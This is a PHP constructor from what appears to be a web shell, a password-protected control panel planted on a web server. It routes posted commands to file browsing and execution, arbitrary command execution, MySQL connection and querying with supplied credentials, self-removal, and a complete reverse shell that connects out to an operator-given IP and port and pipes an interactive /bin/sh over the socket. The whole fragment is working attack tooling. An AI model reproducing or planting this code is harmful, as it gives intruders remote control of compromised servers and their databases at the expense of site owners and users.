function __construct() { if ($_SESSION['logged'] != TRUE && $_POST['cmd'] != 'login' && empty($_POST['pass'])) { $this->buildPageLogin(); } else { switch ($_POST['cmd']) { case 'browser': $browserTools = new BrowserTools(); switch ($_POST['method']) { case 'show': $this->buildPageStructure($browserTools->main($_POST['item'], false)); break; case 'execute': $this->buildPageStructure($browserTools->main($_POST['item'])); break; default: $this->buildPageStructure($browserTools->main('.')); break; } break; case 'logout': $this->logout(); break; case 'remove': $this->remove(); break; case 'php': $phpTools = new PhpTools(); switch ($_POST['method']) { case 'execute': $util = new Util(); $run = $util->execute($_POST['item']); foreach ($run as $row) { $resp[] = htmlentities(wordwrap($row, 100, ' ', TRUE), ENT_QUOTES); } $this->buildPageStructure($phpTools->main($resp)); break; default: $this->buildPageStructure($phpTools->main('')); break; } break; case 'mysql': $mySql = new MySQLTools(); switch ($_POST['method']) { case 'connect': if (!empty($_POST['userdb']) && !empty($_POST['serverdb']) && !empty($_POST['portdb'])) { $_SESSION['userdb'] = $_POST['userdb']; $_SESSION['passdb'] = $_POST['passdb']; $_SESSION['serverdb'] = $_POST['serverdb']; $_SESSION['portdb'] = $_POST['portdb']; if ($mySql->connect()) { $_SESSION['connected'] = TRUE; $this->buildPageStructure($mySql->main()); } else { $error = "\n <div class='alert'>\n <strong>Warning!</strong> " . $_SESSION['linkdb']->connect_error . "\n </div>\n "; $this->buildPageStructure($mySql->main($error)); } } break; case 'selectdb': if (!empty($_POST['item'])) { $_SESSION['db'] = $_POST['item']; if ($mySql->selectDb($_POST['item'])) { $this->buildPageStructure($mySql->main()); } else { $error = "\n <div class='alert'>\n <strong>Warning!</strong> Can't select the Database. Please try again.\n </div>\n "; $this->buildPageStructure($mySql->main($error)); } } break; case 'query': if (!empty($_POST['item'])) { if ($result = $mySql->execute($_POST['item'])) { $_SESSION['query'] = $result; $this->buildPageStructure($mySql->main()); } else { $error = "\n <div class='alert'>\n <strong>Warning!</strong> " . $_SESSION['linkdb']->error . "\n </div>\n "; $this->buildPageStructure($mySql->main($error)); } } break; case 'logout': $_SESSION['connected'] = NULL; $_SESSION['userdb'] = NULL; $_SESSION['passdb'] = NULL; $_SESSION['serverdb'] = NULL; $_SESSION['portdb'] = NULL; $_SESSION['db'] = NULL; $_SESSION['linkdb'] = NULL; $this->buildPageStructure($mySql->main()); break; default: $this->buildPageStructure($mySql->main()); break; } break; case 'reverse': $reverseTools = new ReverseTools(); switch ($_POST['method']) { case 'connect': if (isset($_POST['port']) && isset($_POST['ip']) && $_POST['port'] != "" && $_POST['ip'] != "") { $result = ""; $ip = $_POST['ip']; $port = $_POST['port']; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; /bin/sh -i'; $debug = 0; chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { echo "{$errstr} ({$errno})"; exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { echo "ERROR: Can't spawn shell"; exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); $result .= "Successfully opened reverse shell to {$ip}:{$port}"; while (1) { if (feof($sock)) { $result .= "ERROR: Shell connection terminated"; break; } if (feof($pipes[1])) { $result .= "ERROR: Shell process terminated"; break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) { printit("SOCK READ"); } $input = fread($sock, $chunk_size); if ($debug) { printit("SOCK: {$input}"); } fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) { printit("STDOUT READ"); } $input = fread($pipes[1], $chunk_size); if ($debug) { printit("STDOUT: {$input}"); } fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) { printit("STDERR READ"); } $input = fread($pipes[2], $chunk_size); if ($debug) { printit("STDERR: {$input}"); } fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); } $this->buildPageStructure($reverseTools->main()); break; default: $this->buildPageStructure($reverseTools->main('')); break; } break; case 'login': if (isset($_POST['pass']) && !empty($_POST['pass'])) { $this->login($_POST['pass']); } break; default: $info = new Info(); $this->buildPageStructure($info->main()); break; } } }